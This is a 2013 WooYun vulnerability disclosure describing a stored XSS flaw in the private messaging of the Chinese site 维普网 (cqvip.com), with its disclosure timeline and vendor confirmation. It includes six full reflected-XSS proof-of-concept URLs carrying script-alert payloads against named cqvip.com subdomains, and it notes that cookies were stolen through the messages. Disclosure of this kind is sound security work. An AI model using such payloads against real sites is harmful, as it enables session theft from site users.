当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033353

漏洞标题:维普主站存储型xss可指定用户进行攻击

相关厂商:维普网

漏洞作者: Lxai

提交时间:2013-08-05 18:55

修复时间:2013-09-19 18:55

公开时间:2013-09-19 18:55

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-05: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-19: 细节向公众公开

简要描述:

维普网短消息处未任何过滤导致xss

详细说明:

注册维普网的账号 然后发短消息 第一是没做限制可以发给自己 第二是代码可以执行
------------------------------------------------
问题出在发短消息上。

1.jpg


写新短信

2.jpg


然后全部填上就发送 看到邮件的时候cookie已经盗过来了

3.jpg


收件人写目标 我这里写我自己的 也没限制不能发我自己 这也是一个小问题
标题和内容就写xss代码吧

4.jpg


5.jpg


还有个是在http://bbs.cqvip.com/ 的短消息 虽然javascript的代码不执行
但是可以执行html的
最后还有几个反射性xss
http://2010.cqvip.com:80/asp/vipsearch.asp?Type=M&Query=%C3%F1%D3%AA%C6%F3%D2%B5")><script>alert(42873);</sCript>
http://service.cqvip.com/search.asp?txt=%3Cscript%3Ealert(1)%3C/script%3E
http://ipub.cqvip.com/main/search.aspx?k=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://www.cqvip.com/zuozhekj/search.aspx?st=t&sv=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://train.cqvip.com/search.asp?province=%B3%C7%CA%D0&trade=%C0%E0%B1%F0&t=%3C%2Ftitle%3E%3Cscript%3Ealert%28123321%29%3C%2Fscript%3E%3Ctitle%3E&submit=%C5%E0%D1%B5%CB%D1%CB%F7&pid=&iid=
http://expo.cqvip.com/search.asp?province=%CA%A1%B7%DD&city=%B3%C7%CA%D0&trade=%D0%D0%D2%B5&ts=&te=&t=%3Cscript%3Ealert%281111%29%3C%2Fscript%3E&submit=%CB%D1%CB%F7&pid=&cid=&iid=&tid=

漏洞证明:

6.jpg

修复方案:

你们专业

版权声明:转载请注明来源 Lxai@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-09 22:15

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-10 08:38 | Lxai ( 路人 | Rank:10 漏洞数:8 )

    这次厂商明明给10 我才得了2rank,郁闷~